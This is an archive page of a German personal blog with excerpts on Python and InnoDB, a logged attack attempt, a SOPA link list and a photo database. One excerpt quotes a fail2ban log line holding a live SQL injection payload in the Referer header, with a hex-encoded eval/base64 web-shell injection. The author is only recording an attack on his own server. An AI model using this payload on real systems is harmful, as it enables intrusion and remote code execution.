Spaß mit Python3 und InnoDB
Donnerstag, 13. Januar 2022
Die Blogs, die ich betreibe bzw. administriere, laufen allesamt mit MariaDB, einem Fork von MySQL. Die beiden Datenbank-Systeme kennen zwei verschiedene Engines, um Daten zu verwalten: MyISAM (die ältere) und InnoDB (die neuere). Die Blogs, die ursprünglich mit WordPress gestartet waren, legten ihre Datenbank mit MyISAM an, und auch, wenn die Blogs mittlerweile auf ClassicPress umgestellt wurden, blieb dieses Format erhalten. Was ich neu direkt mit ClassicPress installiert habe, bekam jedoch eine Datenbank mit der InnoDB-Engine, die die Daten ein wenig anders ablegt. Im laufenden Betrieb insbesondere der relativ kleinen Blogs macht das erstmal keinen Unterschied.
Anders sieht das aus, wenn ich abseits vom Blogsystem (hier: mit Python3) in diese Datenbanken reingreifen möchte. Solange ich nur lesend reingehe, ist das weiterhin kein Problem. Will ich jedoch schreibend auf diese Datenbanken zugreifen, gibt es einen kleinen, feinen Unterschied, und der hat mich eine Weile beschäftigt. (mehr …)
Angriffsversuch per Referer
Sonntag, 2. Mai 2021
Eben in einer Meldung von fail2ban gesehen:
114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)
Im Netz aufgefischt #44
Sonntag, 22. Januar 2012
SOPA / PIPA / ACTA / PCIPA
- 18.01.2012 The Guardian: Sopa and Pipa would create a consumption-only internet
- 19.01.2012 Die Zeit: US-Senatoren reagieren auf Protest gegen Netzsperren (via @zeitonline)
- 19.01.2012 Der Freitag/Blogs: SOPA, ein Gesetz das die Online-Freiheit stoppen könnte (via @derfreitag)
- 19.01.2012 techdirt: Jon Stewart Now Knows About SOPA/PIPA... And He's Not Impressed (via ... vergessen)
- 20.01.2012 Dr. Jays: SOPA Is Defeated, But New Internet Bill Gains Critics (via @peterpiksa)
Foto-Datenbank mit Hindernissen
Freitag, 3. Juli 2009
Ich möchte meine Bilder mit einer Datenbank verwalten. Bei geschätzten 15.000 Fotos, Dias und Bilddateien (seit 1982) wird das auch langsam Zeit, wie ich finde. Außerdem möchte ich mir damit fertige Serien bauen, die dann einfach auf die Website gekippt werden können. Der Haken dabei ist, daß ich mich das letzte Mal am Atari ST mit einer relationalen Datenbank befaßt habe -- vor über 15 Jahren. (mehr …)